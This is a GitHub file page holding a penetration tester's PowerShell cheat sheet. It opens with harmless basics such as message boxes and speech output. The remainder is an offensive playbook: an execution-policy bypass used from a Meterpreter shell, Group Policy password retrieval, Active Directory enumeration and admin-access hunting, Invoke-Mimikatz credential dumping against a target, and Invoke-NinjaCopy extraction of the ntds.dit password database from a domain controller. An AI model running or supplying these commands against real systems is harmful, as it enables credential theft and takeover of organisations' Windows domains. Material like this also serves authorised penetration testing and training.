forked from 3mrgnc3/pentest_old
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathpowershell.txt
85 lines (59 loc) · 2.29 KB
/
powershell.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
PowerShell
Write-Host 'Hello World!'
Get-Command # Show all commands.
Get-Content
Get-Eventlog system
Get-Process # Show current running processes.
Set-Content
------------------------------------------------------------------------------------------------------
# Pop-up window
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
[System.Windows.Forms.MessageBox]::Show("<message>" , "<Windows title" , <# - button options>)
Example:
[System.Windows.Forms.MessageBox]::Show("Hello World!" , "Important Message" , 1)
Button options:
0 OK
1 OK, Cancel
2 Abort, Retry, Ignore
3 Yes, No, Cancel
4 Yes, No
5 Retry, Cancel
------------------------------------------------------------------------------------------------------
# Speak
(New-Object -ComObject SAPI.SPVoice).Speak(“Hello World!”)
------------------------------------------------------------------------------------------------------
# Error message
The file Cannot be loaded because the execution of scripts is disabled on this system. Bypass it.
powershell.exe -executionpolicy bypass -file <file>
Use the same command to run a file remotely on a Windows system from an active Meterpreter shell.
------------------------------------------------------------------------------------------------------
# PS Attack
Get-GPPPassword
get-attack “active directory”
get-help Get-NetUser
Get-NetUser -UserName <user>
get-attack groups
get-help Get-NetLocalGroup
Get-NetLocalGroup -GroupName “Administrators”
---------------------------------------------------------
Restart PS Attack and run as a local user Administrator.
get-attack “local admin”
Find-LocalAdminAccess
get-attack find
get-help Invoke-UserHunter
Invoke-UserHunter -Examples
Invoke-UserHunter -CheckAccess
Get-Attack mimi
get-help Invoke-Mimikatz
Invoke-Mimikatz -ComputerName <target> -DumpCreds
---------------------------------------------------------
Restart PS Attack and run as a Domain Admin.
get-attack “domain controller”
Get-NetDomainController
get-attack copy
get-help Invoke-NinjaCopy -Examples
Invoke-NinjaCopy -Path “C:\windows\ntds\ntds.dit” -ComputerName <target> -LocalDestination “C:\ntds.dit”
(takes a little while)
ls
---------------------------------------------------------
PS Attack build tool